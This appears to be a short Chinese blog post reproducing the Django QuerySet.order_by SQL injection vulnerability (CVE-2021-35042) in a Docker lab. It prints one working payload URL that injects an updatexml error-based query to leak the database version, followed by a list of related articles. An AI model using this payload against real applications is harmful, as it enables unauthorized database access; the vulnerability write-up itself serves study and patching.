漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
p***92485 小时前
深入理解与实战SQL IFNULL()函数Y***98519 小时前
DVWA靶场通关——SQL Injection篇蒋士峰DBA修行之路9 小时前
实验二十八 SQL PATCH调优I***t71610 小时前
一条sql 在MySQL中是如何执行的n***F87514 小时前
修改表字段属性,SQL总结Q_Q51100828518 小时前
python+django/flask的情绪宣泄系统a***592618 小时前
【SQL技术】不同数据库引擎 SQL 优化方案剖析喂自己代言19 小时前
常见的关系型数据库有哪些?如何安装和使用Postgres?(中英双语版)愚戏师19 小时前
MySQL SQL 注入程序设计实验室21 小时前
性能提升4倍!使用Granian作为Django项目的ASGI服务器